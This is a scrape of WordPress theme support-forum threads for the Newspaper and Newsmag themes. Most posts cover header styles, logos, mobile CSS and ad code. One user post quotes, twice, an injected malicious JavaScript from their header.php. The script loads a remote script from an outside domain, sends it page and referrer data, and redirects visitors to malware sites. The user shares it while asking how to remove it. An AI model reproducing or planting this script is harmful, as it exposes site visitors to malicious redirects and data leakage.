- TutorialsDefault Block Settings Guide
Hello MrJake84,
Unfortunately, our theme does not have any such an option that allows you a way to use a different header style on posts vs home page, sorry! If you want to have this feature on your frontend, you should implement it yourself because we cannot provide custom work at the moment, sorry! If you want to display more levels in our theme and if you are not aware of the steps which are needed to take in this regard, please consider hiring a freelancer/developer to help you!
Thanks for the message!
Hello,
1. The facebook share button does not have this kind of implementation, sorry. It was never meant to show the share count.
2. The adsense link units could require special implementation such as a code added to the header or footer. You should follow the adsense implementation guide for these types of ads.
Thank you!
Hi Bogdan,
I was able to increase the height of the menu for mobile as well the height of the logo on my newly developed website:
I used the following CSS for Mobile:
.td-main-menu-logo img {
max-height: 100px;
}
.td-header-wrap .td-header-main-menu {
height: 110px !important;
}
.td-main-page-wrap {
padding-top: 106px;
}
#td-top-mobile-toggle i {
line-height: 110px;
}
.header-search-wrap .td-icon-search {
line-height: 110px;
}
.td-post-template-4 .td-crumb-container {
padding-top: 52px;
}
However, When you scroll down, some of the header still shows at the top of the screen. I don’t know how to fully hide it like it hides with the default settings.
Can you please assist?

Hello there
Is is possible to set something up where the header style on posts is different to my home page Page. I would like to do something similar to The Verge where the home page has bigger branding at the top http://www.theverge.com/ than in the posts themselves http://www.theverge.com/2017/2/5/14517858/lady-gaga-super-bowl-2017-halftime-show-protest-song
The menu styles I want are available, I just need to work out a way to switch between them, if possible
Thanks
Hello,
1. This is a fixed size logo template you are using. The logo will not go beyond the contianer size which is 272 pixels wide. If you require a bigger logo, please use the full logo header styles: https://forum.tagdiv.com/header-styles/
2. You can have a different affix logo if you change it here: https://www.screencast.com/t/snM5xFEO
Thank you!
Hello,
Our theme does not have these spots in the theme panel so you will have to add the code manually inside the theme files. Here is the header file: https://www.screencast.com/t/r7AEM9C8
And here is the footer: https://www.screencast.com/t/XPfMTEEyfjH
Thank you!
I found the Ken Burns Effect (moving pictures) on http://www.jeeex.com/.
An explanation on how to do it found here: https://divisoup.com/how-to-add-the-ken-burns-effect-to-the-divi-fullwidth-header/
Is there any chance to integrate it to Newsmag as a feature? Any idea how and where I could integrate it “by hand” now? Frontpage and/or article template (#6?)?
Hello mskeshia,
You should use the code below and place it in Theme panel->Custom CSS area.
The code is ->
@media (max-width: 767px){
.td-header-top-menu-full, .td-header-sp-top-menu {
display: block!important;
}
}
Notice that after this code is needed for some additional customizations if you want to bring best results. You should do it yourself because all of these involves custom work and we cannot provide this type of services at the moment, sorry!
Thanks for the message!
In fact, I’m trying myself with jQuery to addClass, so I can use :before pseudo selector to do it.
Is there any ajax trigger when the results are loaded?
// let's check search lenght
var $jq = jQuery.noConflict();
$jq('#td-header-search').on('input', function() {
if ( ($jq(this).val().length) > 0) $jq(this).addClass('letspin'); // if > 0, give class to show
else $jq(this).removeClass('letspin'); // if search is empty, remove
// BUT HOW TO CHECK IF THE RESULTS WERE LOADED TO REMOVE THE CLASS?
});
Hello,
I was provided with this code for ads. They show fine on desktop but not mobile. In the mobile the header top ad shows instead of the ad. The code was place under the theme options – ads -custom ads.
this is the code
<!–/* OpenX Asynchronous JavaScript tag */–>
<div id=”538743865_1″ style=”width:320px;height:50px;margin:0;padding:0″>
<noscript><iframe id=”ff4eb1251b” name=”ff4eb1251b” src=”//us-ads.openx.net/w/1.0/afr?auid=538743865&cb=1010101″ frameborder=”0″ scrolling=”no” width=”320″ height=”50″></iframe></noscript>
</div>
<script type=”text/javascript”>
var OX_ads = OX_ads || [];
OX_ads.push({
slot_id: “538743865_1”,
auid: “538743865”
});
</script>
<script type=”text/javascript” src=”//us-ads.openx.net/w/1.0/jstag”></script>

how can I delete that thing at mobile
or I want to delete whole bar
how can I do that?
Hello,
The Mobile Header Ad appears above the logo not below.
You can see here.
Can you help about this issue, thanks
Best Regards.
Dears,
I would have several questions regarding the main menu of my website (www.traveleaters.com) and more specifically the logo inclusion in it.
I chose to have my logo displayed on the left part of my menu, using header style template n°7 provided in the newspaper theme, however I happen to have several issue regarding the display of the logo.
1. When on the top of the page, I can’t find a way for my logo to be larger (i.e.. be larger in pixels).I tried to upload different sizes for my image but nothing changes. If I understand it right, the space occupied by the logo on the template is defined in number of pixels. -> Do I have any ways to make my logo take more space on the page ?
2. I would like the logo of main menu to change when user scroll down on the page. For exemple instead of simply showing my logo in smaller, show only the green globe image of my logo.
Thank you in advance very much for your help,
Hello,
My site is nutrabela.com
My lgo appears fine on desktop but and the homepage of mobile. However, when I go to a single post page on mobile, the logo loads in error on both the header and footer.
I made sure I followed the dimensions as instructed for mobile logo upload in theme panel. Not sure what the problem is or if I’m missing a step.
Hi
I know I’ve missed something obvious; started to change our category headers – to
(Newsmag 3.1)
> Header Style 2
> Category pulldown filter [off]
Can’t see how to disable the ul.td.category block under the category NAME; redundant as we’re adding those to top menu bar, and already have category drop-down in sidebar.
e.g.,
https://californianewswire.com/CA/national_news_desk/
oh…. stupid me … no setting for this (ahem, hint hint – should be!)
I can remove this section in td_category_template_2.php
<div class="td-subcategory-header">
<?php
echo parent::get_sibling_categories();
echo parent::get_pull_down();
?>
</div>
Thanks for the reply… I assume I’m installing the code in the wrong spot. Here is a video showing what the code looks like: https://www.youtube.com/watch?v=GQQrdFoBXQU In the video he installs the code in footer and header scripts…. where would be the equivalent on Newspaper?
Cool, I’ve removed the css from Theme Panel, copied header.php into child theme and commented out lines 17 and 18. Works a treat. Thanks Edward.
-
This reply was modified 9 years by
Daniel Finch.
https://forum.tagdiv.com/topic/disable-scroll-to-top-button/
Copy header.php file in your child theme and try to remove the lines 17 & 18.
Sorry, I’m not sure this method is correct. Wait for the answer of developers…
Hello Catalin,
I managed to bring the td-theme files and ‘js_composer_front header in wordpress
// $ This-> move_style_to_footer_queue (‘js_composer_front’);
// $ This-> move_style_to_footer_queue (‘td-theme’);
but I have a problem with indexing of google and GoogleNews it does not index the latest articles published.
As soon as I changed the modifications done, google and GoogleNews has again inserted in indexing articles.
in your opinion what’s the problem ??
Hi Bogdan,
This is the problem, how can I publish the site where the main header images are not displaying properly?
Thanks,
Anna
Well css needs to be more specific in order to reqrite another code. Css works in rewrites and in priorities. You can try to add important tags to your code like so:
.page-id-246 .td-header-wrap {
display:none!important;
}
Thanks.
hi,
im having problems with some malware script that is appearing every day in header.php.
script looks like this and is riderectin my site in another malware sites.
can u please tell me how can i find and remove the malware
thnx.
Script:
“””<script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php’ + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script><script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php’ + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script>”””
Yes, As I said, it works when I add this to custom CSS, but it doesn’t work if I add it directly at the very bottom of style.css. Here is how I did it:

I am only removing top header, and top navigation with this code:
.page-id-246 .td-header-wrap {
display:none;
}
.page-id-28 .td-header-wrap {
display:none;
}
.page-id-27 .td-header-wrap {
display:none;
}
.vc_separator.vc_separator_align_center h4 { font-size: 30px !important; }
.td-main-content-wrap {
padding-bottom: 0;
}
Yes, I have cleared all cache and everything. Let me know if you want to do further checking.
Thank you.
Yes, As I said, it works when I add this to custom CSS, but it doesn’t work if I add it directly at the very bottom of style.css. Here is how I did it:

I am only removing top header, and top navigation with this code:
.page-id-246 .td-header-wrap {
display:none;
}
.page-id-28 .td-header-wrap {
display:none;
}
.page-id-27 .td-header-wrap {
display:none;
}
.vc_separator.vc_separator_align_center h4 { font-size: 30px !important; }
.td-main-content-wrap {
padding-bottom: 0;
}
Yes, I have cleared all cache and everything. Let me know if you want to do further checking.
Thank you.
How do I change the block color and size of text headers in the widget section on saucemonsters.com? I want to make the font bigger on everything in the widget of the right rail. I also want to change the color of the font and the color of the box around the font.